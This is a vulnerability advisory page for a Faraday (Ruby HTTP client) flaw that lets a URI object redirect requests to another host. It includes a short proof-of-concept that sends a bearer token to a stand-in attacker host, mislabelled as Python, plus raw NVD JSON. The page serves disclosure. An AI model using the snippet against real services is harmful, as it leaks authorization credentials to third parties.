Security Vulnerability Report
中文
CVE-2026-33637 CVSS 0.0 NONE

CVE-2026-33637

Published: 2026-05-19 19:16:49
Last Modified: 2026-05-19 21:08:41
Source: [email protected]

Description

Faraday is an HTTP client library abstraction layer that provides a common interface over many adapters. Versions 2.0.0 through 2.14.1 still allow protocol-relative host override when the request target is passed as a URI object (rather than a String) to Faraday::Connection#build_exclusive_url. This bypasses the February 2026 fix for GHSA-33mh-2634-fwr2 and enables off-host request forgery: a request built from a fixed-base Faraday::Connection can be redirected to an attacker-controlled host, forwarding connection-scoped values such as Authorization headers and default query parameters. This issue has been fixed in version 2.14.3.

CVSS Details

CVSS Score
0.0
Severity
NONE
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N

Configurations (Affected Products)

No configuration data available.

Faraday >= 2.0.0, <= 2.14.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
require 'faraday' # Setup a connection with a base URL and an Authorization header conn = Faraday.new('https://api.example.com') do |f| f.headers['Authorization'] = 'Bearer secret-token' f.adapter :net_http end # Exploit: Pass a URI object with a protocol-relative host # This bypasses the fix and sends the request to evil.com malicious_uri = URI.parse('//attacker-controlled.com/log') # The request goes to https://attacker-controlled.com/log # with the header 'Authorization: Bearer secret-token' response = conn.get(malicious_uri)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-33637", "sourceIdentifier": "[email protected]", "published": "2026-05-19T19:16:49.113", "lastModified": "2026-05-19T21:08:41.030", "vulnStatus": "Awaiting Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "Faraday is an HTTP client library abstraction layer that provides a common interface over many adapters. Versions 2.0.0 through 2.14.1 still allow protocol-relative host override when the request target is passed as a URI object (rather than a String) to Faraday::Connection#build_exclusive_url. This bypasses the February 2026 fix for GHSA-33mh-2634-fwr2 and enables off-host request forgery: a request built from a fixed-base Faraday::Connection can be redirected to an attacker-controlled host, forwarding connection-scoped values such as Authorization headers and default query parameters. This issue has been fixed in version 2.14.3."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N", "baseScore": 0.0, "baseSeverity": "NONE", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 0.0}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-918"}]}], "references": [{"url": "https://github.com/advisories/GHSA-33mh-2634-fwr2", "source": "[email protected]"}, {"url": "https://github.com/lostisland/faraday/security/advisories/GHSA-5rv5-xj5j-3484", "source": "[email protected]"}, {"url": "https://github.com/lostisland/faraday/security/advisories/GHSA-5rv5-xj5j-3484", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.